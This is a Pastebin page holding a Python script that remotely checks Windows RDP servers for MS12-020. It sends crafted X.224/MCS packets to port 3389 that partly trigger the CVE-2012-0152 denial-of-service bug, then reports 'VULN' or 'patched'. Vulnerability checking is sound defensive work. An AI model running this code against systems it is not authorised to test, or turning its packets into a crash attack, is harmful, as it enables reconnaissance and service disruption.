SHARE
TWEET

MS12-020 remote checker

a guest Mar 28th, 2012 859 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. #
  4. # MS12-020 checker (no BSOD)
  5. #
  6. # Use DoS bug (CVE-2012-0152) for check
  7. #
  8. # Update: remove RDP negotiation to use standard RDP for Windows 7
  9. #
  10. # by Worawit Wang (sleepya)
  11. #
  12.  
  13. import sys
  14. import socket
  15. from struct import pack,unpack
  16.  
  17. host = sys.argv[1]
  18.  
  19. def make_tpkt(data):
  20.         return pack("!BBH", 3, 0, 4+len(data)) + data
  21.  
  22. def make_x224(type, data):
  23.         return pack("!BB", 1+len(data), type) + data
  24.  
  25.  
  26. sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  27. sk.settimeout(10)
  28. sk.connect((host,3389))
  29.  
  30. # craft connection request
  31. # x224 type 0xe0
  32. # - dst_ref, src_ref, class_opts, data
  33. x224_1 = make_x224(0xe0, pack("!HHB", 0, 0, 0))
  34. sk.send(make_tpkt(x224_1))
  35. data = sk.recv(8192)
  36. if data != "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00":
  37.         print "Cannot check"
  38.         sys.exit()
  39.  
  40. # x224 type 0xf0 (Data TPDU)
  41. # - EOT (0x80)
  42. x224_2 = make_x224(0xf0, pack("!B", 0x80))
  43.  
  44. # craft connect-initial with gcc
  45. target_params = (""
  46.         + "\x02\x01\x22" # maxChannelIds
  47.         + "\x02\x01\x20" # maxUserIds
  48.         + "\x02\x01\x00" # maxTokenIds
  49.         + "\x02\x01\x01" # numPriorities
  50.         + "\x02\x01\x00" # minThroughput
  51.         + "\x02\x01\x01" # maxHeight
  52.         + "\x02\x02\xff\xff" # maxMCSPDUSize
  53.         + "\x02\x01\x02" # protocolVersion
  54. )
  55. min_params = (""
  56.         + "\x02\x01\x01" # maxChannelIds      
  57.         + "\x02\x01\x01" # maxUserIds          
  58.         + "\x02\x01\x01" # maxTokenIds        
  59.         + "\x02\x01\x01" # numPriorities      
  60.         + "\x02\x01\x00" # minThroughput      
  61.         + "\x02\x01\x01" # maxHeight          
  62.         + "\x02\x01\xff" # maxMCSPDUSize
  63.         + "\x02\x01\x02" # protocolVersion
  64. )
  65. max_params = (""
  66.         + "\x02\x01\xff" # maxChannelIds          
  67.         + "\x02\x01\xff" # maxUserIds              
  68.         + "\x02\x01\xff" # maxTokenIds            
  69.         + "\x02\x01\x01" # numPriorities          
  70.         + "\x02\x01\x00" # minThroughput          
  71.         + "\x02\x01\x01" # maxHeight              
  72.         + "\x02\x02\xff\xff" # maxMCSPDUSize
  73.         + "\x02\x01\x02" # protocolVersion
  74. )
  75. mcs_data = (""
  76.         + "\x04\x01\x01" # callingDomainSelector
  77.         + "\x04\x01\x01" # calledDomainSelector
  78.         + "\x01\x01\xff" # upwardFlag
  79.         + "\x30" + pack("B", len(target_params)) + target_params
  80.         + "\x30" + pack("B", len(min_params)) + min_params
  81.         + "\x30" + pack("B", len(max_params)) + max_params
  82.         + "\x04\x00" # userData
  83. )
  84.  
  85. # \x7f\x65  BER: APPLICATION 101 = Connect-Initial (MCS_TYPE_CONNECTINITIAL)
  86. mcs = "\x7f\x65" + pack("!B", len(mcs_data))
  87. sk.send(make_tpkt(x224_2 + mcs + mcs_data))
  88.  
  89. # craft attach user request
  90. sk.send(make_tpkt(x224_2 + "\x28"))
  91. data = sk.recv(8192)
  92. user1 = unpack("!H", data[9:11])[0]
  93.  
  94. sk.send(make_tpkt(x224_2 + "\x28"))
  95. data = sk.recv(8192)
  96. user2 = unpack("!H", data[9:11])[0]
  97.  
  98. # craft channel join request
  99. sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user1, user2+1001)))
  100. data = sk.recv(8192)
  101. if data[7:9] == "\x3e\x00":
  102.         print "!!! VULN !!!"
  103.         # below for safety from BSOD
  104.         sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user2, user2+1001)))
  105.         data = sk.recv(8192)
  106. else:
  107.         print "patched"
  108.  
  109. sk.close()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top